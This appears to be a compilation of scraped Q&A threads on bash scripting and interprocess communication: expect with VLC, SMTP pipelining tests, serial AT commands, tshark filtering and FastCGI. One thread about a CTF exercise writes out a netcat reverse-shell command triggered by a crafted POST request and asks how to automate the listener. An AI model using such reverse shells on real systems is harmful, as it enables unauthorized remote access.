I'm making a bash script to send commands to a launched program, the only way I founded on internet was through named pipes.
Is there an easier way to do it all inside the same script? Because named pipes have the problem that I must have 3 scripts, one for managing the program, other sending the information from the main and then the reader to parse the information to the program (If I correctly understood the above link).
And that is a problem as the manager has to call the others because I need the reader to recieve an array of files as input and I found no way of doing so, if you know how please answer this other question.
Thank you
--- 26/01/2012 ---
After Carl post I tried
#!/bin/bash
MUS_DIR="/home/foo/dir/music"
/usr/bin/expect <<-_EOF_
spawn vlc --global-key-next n $MUS_DIR
sleep 5
send 'n'
sleep 5
send "n"
_EOF_
But it doesn't work, it just spawns vlc but it doesn't skip the song
You might want to check out expect(1).
More details about the program you want to communicate with would be useful.
Essentially you just need some sort of inter process communication. Files/pipes/signals/sockets could be used. Write to a specific file in the script and then send an interrupt the program so it knows to check the file, for example.
Depending on your language of choice, and how much time you can spend on this/how big this project will be. You could have the launched program use a thread to listen on a port for TCP packets and react to them. Then in your bash script you could netcat the information, or send an HTTP POST with curl.
Are you sure it's not possible for the application to be started by the script? Allowing the script to just pass arguments or define some environment variables.
Related
I want to make a bash script that calls automatically smtp port 25 and sends email then I assert that email is queued
I have this much code now
https://github.com/kristijorgji/docker-mailserver/blob/main/tests/smpt.bash
but is not working, I get always
improper command pipelining after DATA from unknown[172.21.0.1]: subject: Test 2022-07-22_17_10_09\r\nA nice test\r\n\r\n
That might be also ok, but please double check my script and give suggestions for improvements if it is ok or fixes
How can I automate this process so I can re-run the script after every configuration change ?
I want to know the best practices
The PIPELINING extension to ESMTP, which is specified in RFC 2920, says:
The EHLO, DATA, VRFY, EXPN, TURN, QUIT, and NOOP commands can only appear as the last command in a group since their success or failure produces a change of state which the client SMTP must accommodate.
This means that you can remove the sleep commands after mail from and rcpt to, but you should introduce a sleep after echo "data" before continuing with the message which is to be delivered. (Just to be clear: You need to wait for the server's response; sleep is just a hack to achieve that.)
I'm doing an exercise (basically just a CTF), where we do some exploits of some vulnerable machines. For example, by sending a specially crafted post request, we can make it execute for example
nc -e /bin/bash 10.0.0.2 2546
What I want to do, is to script my way out of this, to make it easier.
Setup a listener for a specific port
Send a post request to make the machine connect back
Send arbitrary data to the server, e.g. to escalate privileges.
Present user with the shell (e.g. which is sent through nc)
This is not a post on how to either hack it or escalate privileges, but my scripting capabilities (especially in bash!) is not the best.
The problem is when I reach step 2. For obvious reason, I can't start nc -lvp 1234 before sending the post request, since it blocks. And I'm faily sure multithreading in bash is not possible (...somebody have probably made it though.)
nc -lp $lp & # Run in background - probably not a good solution
curl -X POST $url --data "in_command=do_dirty_stuff" # Send data
* MAGIC CONNECTION *
And let's say that I actually succeed with a connection back home, how would I manage to send data from my script, though netcat, before presenting the user with a working shell? Maybe something with piping the netcat data to a file, and use that as a "buffer"?
I know there is a lot of questions, and it can't be answered with one answer, but I'd like to hear more about how people would do that. OR if it's completely ridiculous to do in bash.
I am connecting to a modem over a serial port and trying to figure out how to send an AT command, and add conditionals depending on the output. I can connect using screen or minicom to /dev/ttyAMA0 and send the AT command and receive the response OK, but when I use
echo -en "AT" >/dev/ttyAMA0 && cat /dev/ttyAMA0
I only see what I am echoing, not what the response is. I need to be able to send the AT command, check to see if the output is OK, or ERROR, then based off that response, do something different. Why am I not getting any response from the serial device?
I am trying to create a bash script that can connect to the modem and send a text message, but need to know if there are errors rather than just blasting things through assuming it is working. Is there a better way to accomplish this?
Scripting a dialog through a terminal-like port is a complex enough problem that people have written special tools to do it; the classic is the Expect/Tcl library. I think Tcl is simple to learn, but there are Expect bindings for other scripting languages.
I found this script that uses Expect to communicate over a serial port.
After echoing you cannot simply cat the device file. You need to start a listening loop:
while read -r str < /dev/ttyAMA0; do
# $str will contain a line of text returned from modem.
done
I have a problem where I need to check the TCP packets on a machine.
We use a closed source VOIP system here and I want to open a program when an incoming calls happens.
The VOIP system's software shows the call, however has no functionality to call external software.
I used Wireshark to capture my PCs packets and I'm able to filter the packets easily by
ip.src==AAA.BBB.CCC.DDD && giop.request_op == "pushEvents" && giop.len > 300 && tcp contains "CallInfo"
Now I can work with this package if my custom software could read the package from pipe
Is there a library for purebasic that can do this capturing and filtering??
Alternatively Is there a way to trigger wireshark (console start) so it outputs the filtered data to pipe? (I noticed tshark could do this but does not support this display filter)
Thanks for any constructive answer not hitting me for rtfm ;-)
tshark is just a terminal/console interface to the same engine as GUI Wireshark. It should support all the same protocol dissectors and display filters as GUI app.
I'm pretty sure you're doing something wrong while launching it. Please provide more info why you didn't manage to get tshark working.
To solve your problem: I would launch a tshark with the filter you've come up with so only those packets are displayed on the output. Then I would pipe the output to the simple python/bash/whatever script that launches the app you want on every line of input.
You will also need to take care of specific situations like:
ensure the input line is what it was supposed to be (you can get error lines etc from tshark)
perhaps avoid launching the app if it's already running
I would like to use FastCGI with shell scripts.
I have found several tutorials about writing CGI scripts in shell, but nothing about FastCGI, and I guess this is not the same thing.
Is it possible, and how?
Thank you
Edit: Ignacio: Thank you but this link is 14 years old and says that this is not currently supported. Is it still unsupported?
The whole point of FastCGI is to avoid spawning a new process for each incoming connection. By the very nature of the language, a shell script will spawn many processes during its execution, unless you want to restrict yourself greatly. (No cat, awk, sed, grep, etc, etc). So from the start, if you're going to use shellscript, you may as well use regular CGI instead of FastCGI.
If you're determined anyway, the first big hurdle is that you have to accept() connections on a listening socket provided by the webserver. As far as I know, there is no UNIX tool that does this. Now, you could write one in some other language, and it could run your shellscript once for each incoming connection. But this is exactly what normal CGI does, and I guarantee it does it better than the custom program you or I would write. So again, stick with normal CGI if you want to use shellscript.
"If you're determined anyway, the first big hurdle is that you have to accept() connections on a listening socket provided by the webserver. As far as I know, (...)" there is one C program doing nearly this: exec_with_piped.c
(it's using pipes, not sockets, but the C code should be easily adapted for your purpose)
Look at "Writing agents in sh: conversing through a pipe"
http://okmij.org/ftp/Communications.html
Kalou
No
I apologize in advance if this is a dumb question but is it
conceivable to use a mere shell script (sh or ksh) as a
FastCGI program and if so, how?
You can not use a simple shell script as a FastCGI program. Since
shell script can not persist across multiple HTTP requests, it can not be
used as a FastCGI application. For the program to handle multiple HTTP
requests in its own lifetime (i.e. not just handle requests and die, like
CGI applications), it needs some means to communicate with the web server
to recieve a request, and send the reply back to the server after handling
it. This communication is accomplished via FCGI library, which implements
the above and it currently supports only a subset of programming languages,
like C, Perl, Tcl, Java... In short, it does NOT support shell.
Hope that cleared it up a bit.
Stanley.
From http://www.fastcgi.com/:
FastCGI is simple because it is actually CGI with only a few extensions.
Also:
Like CGI, FastCGI is also language-independent.
So you can use FastCGI with shell scripts or any other kind of scripts, just like CGI.
Tutorials for CGI are useful to learn FastCGI too, except maybe for the particularities of setting up the web server.